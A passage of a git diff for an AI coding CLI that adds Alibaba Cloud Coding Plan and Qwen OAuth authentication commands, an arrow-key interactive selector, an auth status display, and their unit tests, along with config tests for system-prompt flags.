handleCodePlanAuth( + config: Config, + settings: LoadedSettings, + options: QwenAuthOptions, +): Promise { + const { region, key } = options; + + let selectedRegion: CodingPlanRegion; + let selectedKey: string; + + // If region and key are provided as options, use them + if (region && key) { + selectedRegion = + region.toLowerCase() === 'global' + ? CodingPlanRegion.GLOBAL + : CodingPlanRegion.CHINA; + selectedKey = key; + } else { + // Otherwise, prompt interactively + selectedRegion = await promptForRegion(); + selectedKey = await promptForKey(); + } + + writeStdoutLine(t('Processing Alibaba Cloud Coding Plan authentication...')); + + try { + // Get configuration based on region + const { template, version } = getCodingPlanConfig(selectedRegion); + + // Get persist scope + const authTypeScope = getPersistScopeForModelSelection(settings); + + // Backup settings file before modification + const settingsFile = settings.forScope(authTypeScope); + backupSettingsFile(settingsFile.path); + + // Store api-key in settings.env (unified env key) + settings.setValue(authTypeScope, `env.${CODING_PLAN_ENV_KEY}`, selectedKey); + + // Sync to process.env immediately so refreshAuth can read the apiKey + process.env[CODING_PLAN_ENV_KEY] = selectedKey; + + // Generate model configs from template + const newConfigs = template.map((templateConfig) => ({ + ...templateConfig, + envKey: CODING_PLAN_ENV_KEY, + })); + + // Get existing configs + const existingConfigs = + (settings.merged.modelProviders as Record)?.[ + AuthType.USE_OPENAI + ] || []; + + // Filter out all existing Coding Plan configs (mutually exclusive) + const nonCodingPlanConfigs = existingConfigs.filter( + (existing) => !isCodingPlanConfig(existing.baseUrl, existing.envKey), + ); + + // Add new Coding Plan configs at the beginning + const updatedConfigs = [...newConfigs, ...nonCodingPlanConfigs]; + + // Persist to modelProviders + settings.setValue( + authTypeScope, + `modelProviders.${AuthType.USE_OPENAI}`, + updatedConfigs, + ); + + // Also persist authType + settings.setValue( + authTypeScope, + 'security.auth.selectedType', + AuthType.USE_OPENAI, + ); + + // Persist coding plan region + settings.setValue(authTypeScope, 'codingPlan.region', selectedRegion); + + // Persist coding plan version (single field for backward compatibility) + settings.setValue(authTypeScope, 'codingPlan.version', version); + + // If there are configs, use the first one as the model + if (updatedConfigs.length > 0 && updatedConfigs[0]?.id) { + settings.setValue( + authTypeScope, + 'model.name', + (updatedConfigs[0] as ModelConfig).id, + ); + } + + // Refresh auth with the new configuration + await config.refreshAuth(AuthType.USE_OPENAI); + + writeStdoutLine( + t('Successfully authenticated with Alibaba Cloud Coding Plan.'), + ); + } catch (error) { + writeStderrLine( + t('Failed to authenticate with Coding Plan: {{error}}', { + error: getErrorMessage(error), + }), + ); + process.exit(1); + } +} + +/** + * Prompts the user to select a region using an interactive selector + */ +async function promptForRegion(): Promise { + const selector = new InteractiveSelector( + [ + { + value: CodingPlanRegion.CHINA, + label: t('中国 (China)'), + description: t('阿里云百炼 (aliyun.com)'), + }, + { + value: CodingPlanRegion.GLOBAL, + label: t('Global'), + description: t('Alibaba Cloud (alibabacloud.com)'), + }, + ], + t('Select region for Coding Plan:'), + ); + + return await selector.select(); +} + +/** + * Prompts the user to enter an API key + */ +async function promptForKey(): Promise { + // Create a simple password-style input (without echoing characters) + const stdin = process.stdin; + const stdout = process.stdout; + + stdout.write(t('Enter your Coding Plan API key: ')); + + // Set raw mode to capture keystrokes + const wasRaw = stdin.isRaw; + if (stdin.setRawMode) { + stdin.setRawMode(true); + } + stdin.resume(); + + return new Promise((resolve, reject) => { + let input = ''; + + const onData = (chunk: string) => { + for (const char of chunk) { + switch (char) { + case '\r': // Enter + case '\n': + stdin.removeListener('data', onData); + if (stdin.setRawMode) { + stdin.setRawMode(wasRaw); + } + stdout.write('\n'); // New line after input + resolve(input); + return; + case '\x03': // Ctrl+C + stdin.removeListener('data', onData); + if (stdin.setRawMode) { + stdin.setRawMode(wasRaw); + } + stdout.write('^C\n'); + reject(new Error('Interrupted')); + return; + case '\x08': // Backspace + case '\x7F': // Delete + if (input.length > 0) { + input = input.slice(0, -1); + // Move cursor back, print space, move back again + stdout.write('\x1B[D \x1B[D'); + } + break; + default: + // Add character to input + input += char; + // Print asterisk instead of the actual character for security + stdout.write('*'); + break; + } + } + }; + + stdin.on('data', onData); + }); +} + +/** + * Runs the interactive authentication flow + */ +export async function runInteractiveAuth() { + const selector = new InteractiveSelector( + [ + { + value: 'qwen-oauth' as const, + label: t('Qwen OAuth'), + description: t('Free · Up to 1,000 requests/day · Qwen latest models'), + }, + { + value: 'coding-plan' as const, + label: t('Alibaba Cloud Coding Plan'), + description: t( + 'Paid · Up to 6,000 requests/5 hrs · All Alibaba Cloud Coding Plan Models', + ), + }, + ], + t('Select authentication method:'), + ); + + const choice = await selector.select(); + + if (choice === 'coding-plan') { + await handleQwenAuth('coding-plan', {}); + } else { + await handleQwenAuth('qwen-oauth', {}); + } +} + +/** + * Shows the current authentication status + */ +export async function showAuthStatus(): Promise { + try { + const settings = loadSettings(); + const mergedSettings = settings.merged as MergedSettingsWithCodingPlan; + + writeStdoutLine(t('\n=== Authentication Status ===\n')); + + // Check for selected auth type + const selectedType = mergedSettings.security?.auth?.selectedType; + + if (!selectedType) { + writeStdoutLine(t('⚠️ No authentication method configured.\n')); + writeStdoutLine(t('Run one of the following commands to get started:\n')); + writeStdoutLine( + t( + ' qwen auth qwen-oauth - Authenticate with Qwen OAuth (free tier)', + ), + ); + writeStdoutLine( + t( + ' qwen auth coding-plan - Authenticate with Alibaba Cloud Coding Plan\n', + ), + ); + writeStdoutLine(t('Or simply run:')); + writeStdoutLine( + t(' qwen auth - Interactive authentication setup\n'), + ); + process.exit(0); + } + + // Display status based on auth type + if (selectedType === AuthType.QWEN_OAUTH) { + writeStdoutLine(t('✓ Authentication Method: Qwen OAuth')); + writeStdoutLine(t(' Type: Free tier')); + writeStdoutLine(t(' Limit: Up to 1,000 requests/day')); + writeStdoutLine(t(' Models: Qwen latest models\n')); + } else if (selectedType === AuthType.USE_OPENAI) { + // Check for Coding Plan configuration + const codingPlanRegion = mergedSettings.codingPlan?.region; + const codingPlanVersion = mergedSettings.codingPlan?.version; + const modelName = mergedSettings.model?.name; + + // Check if API key is set in environment + const hasApiKey = + !!process.env[CODING_PLAN_ENV_KEY] || + !!mergedSettings.env?.[CODING_PLAN_ENV_KEY]; + + if (hasApiKey) { + writeStdoutLine( + t('✓ Authentication Method: Alibaba Cloud Coding Plan'), + ); + + if (codingPlanRegion) { + const regionDisplay = + codingPlanRegion === CodingPlanRegion.CHINA + ? t('中国 (China) - 阿里云百炼') + : t('Global - Alibaba Cloud'); + writeStdoutLine(t(' Region: {{region}}', { region: regionDisplay })); + } + + if (modelName) { + writeStdoutLine( + t(' Current Model: {{model}}', { model: modelName }), + ); + } + + if (codingPlanVersion) { + writeStdoutLine( + t(' Config Version: {{version}}', { + version: codingPlanVersion.substring(0, 8) + '...', + }), + ); + } + + writeStdoutLine(t(' Status: API key configured\n')); + } else { + writeStdoutLine( + t( + '⚠️ Authentication Method: Alibaba Cloud Coding Plan (Incomplete)', + ), + ); + writeStdoutLine( + t(' Issue: API key not found in environment or settings\n'), + ); + writeStdoutLine(t(' Run `qwen auth coding-plan` to re-configure.\n')); + } + } else { + writeStdoutLine( + t('✓ Authentication Method: {{type}}', { type: selectedType }), + ); + writeStdoutLine(t(' Status: Configured\n')); + } + process.exit(0); + } catch (error) { + writeStderrLine( + t('Failed to check authentication status: {{error}}', { + error: getErrorMessage(error), + }), + ); + process.exit(1); + } +} diff --git a/packages/cli/src/commands/auth/interactiveSelector.test.ts b/packages/cli/src/commands/auth/interactiveSelector.test.ts new file mode 100644 index 000000000..e580cb3bf --- /dev/null +++ b/packages/cli/src/commands/auth/interactiveSelector.test.ts @@ -0,0 +1,421 @@ +/** + * @license + * Copyright 2025 Google LLC + * SPDX-License-Identifier: Apache-2.0 + */ + +/* eslint-disable @typescript-eslint/no-explicit-any */ + +import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'; +import { InteractiveSelector } from './interactiveSelector.js'; +import { stdin, stdout } from 'node:process'; + +describe('InteractiveSelector', () => { + const mockOptions = [ + { value: 'option1', label: 'Option 1', description: 'First option' }, + { value: 'option2', label: 'Option 2', description: 'Second option' }, + { value: 'option3', label: 'Option 3', description: 'Third option' }, + ]; + + const mockPrompt = 'Select an option:'; + + beforeEach(() => { + vi.clearAllMocks(); + }); + + afterEach(() => { + vi.restoreAllMocks(); + }); + + describe('constructor', () => { + it('should create an instance with default prompt', () => { + const selector = new InteractiveSelector(mockOptions); + expect(selector).toBeInstanceOf(InteractiveSelector); + }); + + it('should create an instance with custom prompt', () => { + const selector = new InteractiveSelector(mockOptions, mockPrompt); + expect(selector).toBeInstanceOf(InteractiveSelector); + }); + }); + + describe('select', () => { + it('should reject if raw mode is not available', async () => { + // Mock stdin without setRawMode + const originalSetRawMode = stdin.setRawMode; + (stdin as any).setRawMode = undefined; + + const selector = new InteractiveSelector(mockOptions, mockPrompt); + + await expect(selector.select()).rejects.toThrow( + 'Raw mode not available. Please run in an interactive terminal.', + ); + + // Restore + (stdin as any).setRawMode = originalSetRawMode; + }); + + it('should select first option with Enter key', async () => { + const mockSetRawMode = vi.fn(); + const mockResume = vi.fn(); + const mockSetEncoding = vi.fn(); + const mockRemoveListener = vi.fn(); + const mockOn = vi.fn((event: any, callback: any) => { + // Simulate Enter key press + setTimeout(() => callback('\r'), 0); + return stdin; + }); + + (stdin as any).isRaw = false; + (stdin as any).setRawMode = mockSetRawMode; + (stdin as any).resume = mockResume; + (stdin as any).setEncoding = mockSetEncoding; + (stdin as any).removeListener = mockRemoveListener; + (stdin as any).on = mockOn; + + const stdoutWriteSpy = vi + .spyOn(stdout, 'write') + .mockImplementation(() => true); + + const selector = new InteractiveSelector(mockOptions, mockPrompt); + const result = await selector.select(); + + expect(result).toBe('option1'); + expect(mockSetRawMode).toHaveBeenCalledWith(true); + expect(mockResume).toHaveBeenCalled(); + + stdoutWriteSpy.mockRestore(); + }); + + it('should select second option after arrow down then Enter', async () => { + let dataCallback!: (chunk: string) => void; + + const mockSetRawMode = vi.fn(); + const mockResume = vi.fn(); + const mockOn = vi.fn((event: any, callback: any) => { + dataCallback = callback; + return stdin; + }); + const mockRemoveListener = vi.fn(); + + (stdin as any).isRaw = false; + (stdin as any).setRawMode = mockSetRawMode; + (stdin as any).resume = mockResume; + (stdin as any).on = mockOn; + (stdin as any).removeListener = mockRemoveListener; + + const stdoutWriteSpy = vi + .spyOn(stdout, 'write') + .mockImplementation(() => true); + + const selector = new InteractiveSelector(mockOptions, mockPrompt); + const selectPromise = selector.select(); + + // Simulate arrow down + dataCallback('\x1B[B'); + + // Simulate Enter + setTimeout(() => dataCallback('\r'), 0); + + const result = await selectPromise; + + expect(result).toBe('option2'); + + stdoutWriteSpy.mockRestore(); + }); + + it('should handle arrow up navigation', async () => { + let dataCallback!: (chunk: string) => void; + + const mockSetRawMode = vi.fn(); + const mockResume = vi.fn(); + const mockOn = vi.fn((event: any, callback: any) => { + dataCallback = callback; + return stdin; + }); + const mockRemoveListener = vi.fn(); + + (stdin as any).isRaw = false; + (stdin as any).setRawMode = mockSetRawMode; + (stdin as any).resume = mockResume; + (stdin as any).on = mockOn; + (stdin as any).removeListener = mockRemoveListener; + + const stdoutWriteSpy = vi + .spyOn(stdout, 'write') + .mockImplementation(() => true); + + const selector = new InteractiveSelector(mockOptions, mockPrompt); + const selectPromise = selector.select(); + + // Move down twice + dataCallback('\x1B[B'); + dataCallback('\x1B[B'); + + // Move up once + dataCallback('\x1B[A'); + + // Simulate Enter + setTimeout(() => dataCallback('\r'), 0); + + const result = await selectPromise; + + expect(result).toBe('option2'); + + stdoutWriteSpy.mockRestore(); + }); + + it('should reject with Ctrl+C', async () => { + let dataCallback!: (chunk: string) => void; + + const mockSetRawMode = vi.fn(); + const mockResume = vi.fn(); + const mockOn = vi.fn((event: any, callback: any) => { + dataCallback = callback; + return stdin; + }); + const mockRemoveListener = vi.fn(); + + (stdin as any).isRaw = false; + (stdin as any).setRawMode = mockSetRawMode; + (stdin as any).resume = mockResume; + (stdin as any).on = mockOn; + (stdin as any).removeListener = mockRemoveListener; + + const selector = new InteractiveSelector(mockOptions, mockPrompt); + const selectPromise = selector.select(); + + // Simulate Ctrl+C + setTimeout(() => dataCallback('\x03'), 0); + + await expect(selectPromise).rejects.toThrow('Interrupted'); + }); + + it('should wrap around when navigating past last option', async () => { + let dataCallback!: (chunk: string) => void; + + const mockSetRawMode = vi.fn(); + const mockResume = vi.fn(); + const mockOn = vi.fn((event: any, callback: any) => { + dataCallback = callback; + return stdin; + }); + const mockRemoveListener = vi.fn(); + + (stdin as any).isRaw = false; + (stdin as any).setRawMode = mockSetRawMode; + (stdin as any).resume = mockResume; + (stdin as any).on = mockOn; + (stdin as any).removeListener = mockRemoveListener; + + const stdoutWriteSpy = vi + .spyOn(stdout, 'write') + .mockImplementation(() => true); + + const selector = new InteractiveSelector(mockOptions, mockPrompt); + const selectPromise = selector.select(); + + // Move down past last option (should wrap to first) + dataCallback('\x1B[B'); + dataCallback('\x1B[B'); + dataCallback('\x1B[B'); // Now at option1 again (wrapped) + + // Simulate Enter + setTimeout(() => dataCallback('\r'), 0); + + const result = await selectPromise; + + expect(result).toBe('option1'); + + stdoutWriteSpy.mockRestore(); + }); + + it('should wrap around when navigating before first option', async () => { + let dataCallback!: (chunk: string) => void; + + const mockSetRawMode = vi.fn(); + const mockResume = vi.fn(); + const mockOn = vi.fn((event: any, callback: any) => { + dataCallback = callback; + return stdin; + }); + const mockRemoveListener = vi.fn(); + + (stdin as any).isRaw = false; + (stdin as any).setRawMode = mockSetRawMode; + (stdin as any).resume = mockResume; + (stdin as any).on = mockOn; + (stdin as any).removeListener = mockRemoveListener; + + const stdoutWriteSpy = vi + .spyOn(stdout, 'write') + .mockImplementation(() => true); + + const selector = new InteractiveSelector(mockOptions, mockPrompt); + const selectPromise = selector.select(); + + // Move up from first option (should wrap to last) + dataCallback('\x1B[A'); + + // Simulate Enter + setTimeout(() => dataCallback('\r'), 0); + + const result = await selectPromise; + + expect(result).toBe('option3'); + + stdoutWriteSpy.mockRestore(); + }); + + it('should ignore arrow left/right keys', async () => { + let dataCallback!: (chunk: string) => void; + + const mockSetRawMode = vi.fn(); + const mockResume = vi.fn(); + const mockOn = vi.fn((event: any, callback: any) => { + dataCallback = callback; + return stdin; + }); + const mockRemoveListener = vi.fn(); + + (stdin as any).isRaw = false; + (stdin as any).setRawMode = mockSetRawMode; + (stdin as any).resume = mockResume; + (stdin as any).on = mockOn; + (stdin as any).removeListener = mockRemoveListener; + + const stdoutWriteSpy = vi + .spyOn(stdout, 'write') + .mockImplementation(() => true); + + const selector = new InteractiveSelector(mockOptions, mockPrompt); + const selectPromise = selector.select(); + + // Press arrow right (should be ignored) + dataCallback('\x1B[C'); + + // Press arrow left (should be ignored) + dataCallback('\x1B[D'); + + // Press Enter - should still select first option + setTimeout(() => dataCallback('\r'), 0); + + const result = await selectPromise; + + expect(result).toBe('option1'); + + stdoutWriteSpy.mockRestore(); + }); + + it('should handle newline character as Enter', async () => { + let dataCallback!: (chunk: string) => void; + + const mockSetRawMode = vi.fn(); + const mockResume = vi.fn(); + const mockOn = vi.fn((event: any, callback: any) => { + dataCallback = callback; + return stdin; + }); + const mockRemoveListener = vi.fn(); + + (stdin as any).isRaw = false; + (stdin as any).setRawMode = mockSetRawMode; + (stdin as any).resume = mockResume; + (stdin as any).on = mockOn; + (stdin as any).removeListener = mockRemoveListener; + + const stdoutWriteSpy = vi + .spyOn(stdout, 'write') + .mockImplementation(() => true); + + const selector = new InteractiveSelector(mockOptions, mockPrompt); + const selectPromise = selector.select(); + + // Simulate newline + setTimeout(() => dataCallback('\n'), 0); + + const result = await selectPromise; + + expect(result).toBe('option1'); + + stdoutWriteSpy.mockRestore(); + }); + }); + + describe('renderMenu', () => { + it('should render menu with correct formatting', () => { + const stdoutWriteSpy = vi + .spyOn(stdout, 'write') + .mockImplementation(() => true); + + const selector = new InteractiveSelector(mockOptions, mockPrompt); + + // Access private method for testing + (selector as any).renderMenu(); + + expect(stdoutWriteSpy).toHaveBeenCalled(); + const output = stdoutWriteSpy.mock.calls.map((call) => call[0]).join(''); + + expect(output).toContain('Select an option:'); + expect(output).toContain('Option 1'); + expect(output).toContain('Option 2'); + expect(output).toContain('Option 3'); + expect(output).toContain('First option'); + expect(output).toContain('Second option'); + expect(output).toContain('Third option'); + expect(output).toContain('↑ ↓'); + expect(output).toContain('Enter'); + expect(output).toContain('Ctrl+C'); + + stdoutWriteSpy.mockRestore(); + }); + + it('should highlight selected option', () => { + const stdoutWriteSpy = vi + .spyOn(stdout, 'write') + .mockImplementation(() => true); + + const selector = new InteractiveSelector(mockOptions, mockPrompt); + (selector as any).selectedIndex = 1; + (selector as any).renderMenu(); + + const output = stdoutWriteSpy.mock.calls.map((call) => call[0]).join(''); + + // Selected option should have cyan color code + expect(output).toContain('\x1B[36m'); + + stdoutWriteSpy.mockRestore(); + }); + + it('should calculate correct total lines', () => { + const selector = new InteractiveSelector(mockOptions, mockPrompt); + + // Access private method for testing + (selector as any).calculateTotalLines(); + + // Expected: 4 (prompt + empty + empty + instructions) + 3 (options) = 7 + expect((selector as any).calculateTotalLines()).toBe(7); + }); + + it('should handle options without descriptions', () => { + const simpleOptions = [ + { value: 'a', label: 'A' }, + { value: 'b', label: 'B' }, + ]; + + const stdoutWriteSpy = vi + .spyOn(stdout, 'write') + .mockImplementation(() => true); + + const selector = new InteractiveSelector(simpleOptions, mockPrompt); + (selector as any).renderMenu(); + + const output = stdoutWriteSpy.mock.calls.map((call) => call[0]).join(''); + + expect(output).toContain('A'); + expect(output).toContain('B'); + + stdoutWriteSpy.mockRestore(); + }); + }); +}); diff --git a/packages/cli/src/commands/auth/interactiveSelector.ts b/packages/cli/src/commands/auth/interactiveSelector.ts new file mode 100644 index 000000000..84b9c9f0d --- /dev/null +++ b/packages/cli/src/commands/auth/interactiveSelector.ts @@ -0,0 +1,166 @@ +/** + * @license + * Copyright 2025 Google LLC + * SPDX-License-Identifier: Apache-2.0 + */ + +import { stdin, stdout } from 'node:process'; +import { t } from '../../i18n/index.js'; + +/** + * Represents an option in the interactive selector + */ +interface Option { + value: T; + label: string; + description?: string; +} + +/** + * Interactive selector that allows users to navigate with arrow keys + */ +export class InteractiveSelector { + private selectedIndex = 0; + private isListening = false; + + constructor( + private options: Array>, + private prompt: string = t('Select an option:'), + ) {} + + /** + * Shows the interactive menu and waits for user selection + */ + async select(): Promise { + return new Promise((resolve, reject) => { + this.isListening = true; + + // Display initial menu + this.renderMenu(); + + // Check if stdin supports raw mode + if (!stdin.setRawMode) { + // Fallback to readline if raw mode is not available (e.g., when piped) + reject( + new Error( + t('Raw mode not available. Please run in an interactive terminal.'), + ), + ); + return; + } + + const wasRaw = stdin.isRaw; + stdin.setRawMode(true); + stdin.resume(); + stdin.setEncoding('utf8'); + + const onData = (chunk: string) => { + if (!this.isListening) return; + + for (const char of chunk) { + switch (char) { + case '\x03': // Ctrl+C + stdin.removeListener('data', onData); + stdin.setRawMode(wasRaw); + reject(new Error('Interrupted')); + return; + case '\r': // Enter + case '\n': // Newline + stdin.removeListener('data', onData); + stdin.setRawMode(wasRaw); + resolve(this.options[this.selectedIndex].value); + return; + case '\x1B': // ESC sequence + // Next character will be [, then A, B, C, or D + break; + default: + // Handle other characters if needed + break; + } + } + + // Handle escape sequences + if (chunk.startsWith('\x1B')) { + if (chunk === '\x1B[A') { + // Arrow up + this.moveUp(); + } else if (chunk === '\x1B[B') { + // Arrow down + this.moveDown(); + } else if (chunk === '\x1B[C') { + // Arrow right + // Do nothing for now + } else if (chunk === '\x1B[D') { + // Arrow left + // Do nothing for now + } + } + }; + + stdin.on('data', onData); + }); + } + + /** + * Renders the menu to stdout + */ + private renderMenu(): void { + // Calculate how many lines we need to clear + const totalLines = this.calculateTotalLines(); + + // Clear the screen area we'll be using + if (totalLines > 0) { + stdout.write(`\x1B[${totalLines}A\x1B[J`); // Move up and clear from cursor down + } + + // Write the prompt + stdout.write(`${this.prompt}\n\n`); + + // Write each option - combine label and description on same line + this.options.forEach((option, index) => { + const isSelected = index === this.selectedIndex; + const indicator = isSelected ? '> ' : ' '; + const color = isSelected ? '\x1B[36m' : '\x1B[0m'; // Cyan for selected, default for others + const reset = '\x1B[0m'; + + // Combine label and description in one line + let line = `${indicator}${color}${option.label}`; + if (option.description) { + line += ` - ${option.description}`; + } + line += `${reset}\n`; + + stdout.write(line); + }); + + // Add instructions + stdout.write( + `\n${t('(Use ↑ ↓ arrows to navigate, Enter to select, Ctrl+C to exit)\n')}`, + ); + } + + /** + * Calculates the total number of lines to clear + */ + private calculateTotalLines(): number { + // Lines for: prompt (1) + empty line (1) + options (each option takes 1 line) + empty line (1) + instructions (1) + return 4 + this.options.length; + } + + /** + * Moves selection up + */ + private moveUp(): void { + this.selectedIndex = + (this.selectedIndex - 1 + this.options.length) % this.options.length; + this.renderMenu(); + } + + /** + * Moves selection down + */ + private moveDown(): void { + this.selectedIndex = (this.selectedIndex + 1) % this.options.length; + this.renderMenu(); + } +} diff --git a/packages/cli/src/commands/auth/status.test.ts b/packages/cli/src/commands/auth/status.test.ts new file mode 100644 index 000000000..b0f2be210 --- /dev/null +++ b/packages/cli/src/commands/auth/status.test.ts @@ -0,0 +1,266 @@ +/** + * @license + * Copyright 2025 Google LLC + * SPDX-License-Identifier: Apache-2.0 + */ + +import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'; +import { showAuthStatus } from './handler.js'; +import { AuthType } from '@qwen-code/qwen-code-core'; +import { CODING_PLAN_ENV_KEY } from '../../constants/codingPlan.js'; +import type { LoadedSettings } from '../../config/settings.js'; + +vi.mock('../../config/settings.js', () => ({ + loadSettings: vi.fn(), +})); + +vi.mock('../../utils/stdioHelpers.js', () => ({ + writeStdoutLine: vi.fn(), + writeStderrLine: vi.fn(), +})); + +import { loadSettings } from '../../config/settings.js'; +import { writeStdoutLine, writeStderrLine } from '../../utils/stdioHelpers.js'; + +describe('showAuthStatus', () => { + beforeEach(() => { + vi.clearAllMocks(); + vi.spyOn(process, 'exit').mockImplementation((() => undefined) as never); + delete process.env[CODING_PLAN_ENV_KEY]; + }); + + afterEach(() => { + vi.restoreAllMocks(); + delete process.env[CODING_PLAN_ENV_KEY]; + }); + + const createMockSettings = ( + merged: Record, + ): LoadedSettings => + ({ + merged, + system: { settings: {}, path: '/system.json' }, + systemDefaults: { settings: {}, path: '/system-defaults.json' }, + user: { settings: {}, path: '/user.json' }, + workspace: { settings: {}, path: '/workspace.json' }, + forScope: vi.fn(), + setValue: vi.fn(), + isTrusted: true, + }) as unknown as LoadedSettings; + + it('should show message when no authentication is configured', async () => { + vi.mocked(loadSettings).mockReturnValue(createMockSettings({})); + + await showAuthStatus(); + + expect(writeStdoutLine).toHaveBeenCalledWith( + expect.stringContaining('No authentication method configured'), + ); + expect(writeStdoutLine).toHaveBeenCalledWith( + expect.stringContaining('qwen auth qwen-oauth'), + ); + expect(writeStdoutLine).toHaveBeenCalledWith( + expect.stringContaining('qwen auth coding-plan'), + ); + expect(process.exit).toHaveBeenCalledWith(0); + }); + + it('should show Qwen OAuth status when configured', async () => { + vi.mocked(loadSettings).mockReturnValue( + createMockSettings({ + security: { + auth: { + selectedType: AuthType.QWEN_OAUTH, + }, + }, + }), + ); + + await showAuthStatus(); + + expect(writeStdoutLine).toHaveBeenCalledWith( + expect.stringContaining('Qwen OAuth'), + ); + expect(writeStdoutLine).toHaveBeenCalledWith( + expect.stringContaining('Free tier'), + ); + expect(writeStdoutLine).toHaveBeenCalledWith( + expect.stringContaining('1,000 requests/day'), + ); + expect(process.exit).toHaveBeenCalledWith(0); + }); + + it('should show Coding Plan status when configured with API key', async () => { + process.env[CODING_PLAN_ENV_KEY] = 'test-api-key'; + + vi.mocked(loadSettings).mockReturnValue( + createMockSettings({ + security: { + auth: { + selectedType: AuthType.USE_OPENAI, + }, + }, + codingPlan: { + region: 'china', + version: 'abc123def456', + }, + model: { + name: 'qwen3.5-plus', + }, + }), + ); + + await showAuthStatus(); + + expect(writeStdoutLine).toHaveBeenCalledWith( + expect.stringContaining('Alibaba Cloud Coding Plan'), + ); + expect(writeStdoutLine).toHaveBeenCalledWith( + expect.stringContaining('API key configured'), + ); + expect(process.exit).toHaveBeenCalledWith(0); + }); + + it('should show Coding Plan as incomplete when API key is missing', async () => { + vi.mocked(loadSettings).mockReturnValue( + createMockSettings({ + security: { + auth: { + selectedType: AuthType.USE_OPENAI, + }, + }, + codingPlan: { + region: 'global', + }, + }), + ); + + await showAuthStatus(); + + expect(writeStdoutLine).toHaveBeenCalledWith( + expect.stringContaining('Incomplete'), + ); + expect(writeStdoutLine).toHaveBeenCalledWith( + expect.stringContaining('API key not found'), + ); + }); + + it('should show Coding Plan region for china', async () => { + process.env[CODING_PLAN_ENV_KEY] = 'test-api-key'; + + vi.mocked(loadSettings).mockReturnValue( + createMockSettings({ + security: { + auth: { + selectedType: AuthType.USE_OPENAI, + }, + }, + codingPlan: { + region: 'china', + }, + model: { + name: 'qwen3.5-plus', + }, + }), + ); + + await showAuthStatus(); + + expect(writeStdoutLine).toHaveBeenCalledWith( + expect.stringContaining('中国 (China)'), + ); + }); + + it('should show Coding Plan region for global', async () => { + process.env[CODING_PLAN_ENV_KEY] = 'test-api-key'; + + vi.mocked(loadSettings).mockReturnValue( + createMockSettings({ + security: { + auth: { + selectedType: AuthType.USE_OPENAI, + }, + }, + codingPlan: { + region: 'global', + }, + model: { + name: 'qwen3-coder-plus', + }, + }), + ); + + await showAuthStatus(); + + expect(writeStdoutLine).toHaveBeenCalledWith( + expect.stringContaining('Global'), + ); + }); + + it('should show current model name', async () => { + process.env[CODING_PLAN_ENV_KEY] = 'test-api-key'; + + vi.mocked(loadSettings).mockReturnValue( + createMockSettings({ + security: { + auth: { + selectedType: AuthType.USE_OPENAI, + }, + }, + codingPlan: { + region: 'china', + }, + model: { + name: 'qwen3.5-plus', + }, + }), + ); + + await showAuthStatus(); + + expect(writeStdoutLine).toHaveBeenCalledWith( + expect.stringContaining('qwen3.5-plus'), + ); + }); + + it('should show config version (truncated)', async () => { + process.env[CODING_PLAN_ENV_KEY] = 'test-api-key'; + + vi.mocked(loadSettings).mockReturnValue( + createMockSettings({ + security: { + auth: { + selectedType: AuthType.USE_OPENAI, + }, + }, + codingPlan: { + region: 'china', + version: 'abc123def456789', + }, + model: { + name: 'qwen3.5-plus', + }, + }), + ); + + await showAuthStatus(); + + expect(writeStdoutLine).toHaveBeenCalledWith( + expect.stringContaining('abc123de...'), + ); + }); + + it('should handle errors and exit with code 1', async () => { + const error = new Error('Settings load failed'); + vi.mocked(loadSettings).mockImplementation(() => { + throw error; + }); + + await showAuthStatus(); + + expect(writeStderrLine).toHaveBeenCalledWith( + expect.stringContaining('Failed to check authentication status'), + ); + expect(process.exit).toHaveBeenCalledWith(1); + }); +}); diff --git a/packages/cli/src/config/config.test.ts b/packages/cli/src/config/config.test.ts index 644fc050c..207ecb8dd 100644 --- a/packages/cli/src/config/config.test.ts +++ b/packages/cli/src/config/config.test.ts @@ -241,6 +241,30 @@ describe('parseArguments', () => { expect(argv.prompt).toBeUndefined(); }); + it('should parse --system-prompt', async () => { + process.argv = [ + 'node', + 'script.js', + '--system-prompt', + 'You are a test system prompt.', + ]; + const argv = await parseArguments(); + expect(argv.systemPrompt).toBe('You are a test system prompt.'); + expect(argv.appendSystemPrompt).toBeUndefined(); + }); + + it('should parse --append-system-prompt', async () => { + process.argv = [ + 'node', + 'script.js', + '--append-system-prompt', + 'Be extra concise.', + ]; + const argv = await parseArguments(); + expect(argv.appendSystemPrompt).toBe('Be extra concise.'); + expect(argv.systemPrompt).toBeUndefined(); + }); + it('should allow -r flag as alias for --resume', async () => { process.argv = [ 'node', @@ -432,6 +456,21 @@ describe('parseArguments', () => { mockExit.mockRestore(); }); + it('should allow --system-prompt and --append-system-prompt together', async () => { + process.argv = [ + 'node', + 'script.js', + '--system-prompt', + 'Override prompt', + '--append-system-prompt', + 'Append prompt', + ]; + + const argv = await parseArguments(); + expect(argv.systemPrompt).toBe('Override prompt'); + expect(argv.appendSystemPrompt).toBe('Append prompt'); + }); + it('should throw an error when include-partial-messages is used without stream-json output', async () => { process.argv = ['node', 'script.js', '--include-partial-messages']; @@ -983,7 +1022,7 @@ describe('mergeExcludeTools', () => { process.argv = ['node', 'script.js']; const argv = await parseArguments(); const config = await loadCliConfig(settings, argv, undefined, []); - expect(config.getExcludeTools()).toEqual([]); + expect(config.getPermissionsDeny()).toEqual([]); }); it('should return default excludes when no excludeTools are specified and it is not interactive', async () => { @@ -992,7 +1031,7 @@ describe('mergeExcludeTools', () => { process.argv = ['node', 'script.js', '-p', 'test']; const argv = await parseArguments(); const config = await loadCliConfig(settings, argv, undefined, []); - expect(config.getExcludeTools()).toEqual(defaultExcludes); + expect(config.getPermissionsDeny()).toEqual(defaultExcludes); }); it('should handle settings with excludeTools but no extensions', async () => { @@ -1000,10 +1039,10 @@ describe('mergeExcludeTools', () => { const argv = await parseArguments(); const settings: Settings = { tools: { exclude: ['tool1', 'tool2'] } }; const config = await loadCliConfig(settings, argv, undefined, []); - expect(config.getExcludeTools()).toEqual( + expect(config.getPermissionsDeny()).toEqual( expect.arrayContaining(['tool1', 'tool2']), ); - expect(config.getExcludeTools()).toHaveLength(2); + expect(config.getPermissionsDeny()).toHaveLength(2); }); }); @@ -1028,7 +1067,7 @@ describe('Approval mode tool exclusion logic', () => { const settings: Settings = {}; const config = await loadCliConfig(settings, argv, undefined, []); - const excludedTools = config.getExcludeTools(); + const excludedTools = config.getPermissionsDeny(); expect(excludedTools).toContain(ShellTool.Name); expect(excludedTools).toContain(EditTool.Name); expect(excludedTools).toContain(WriteFileTool.Name); @@ -1047,7 +1086,7 @@ describe('Approval mode tool exclusion logic', () 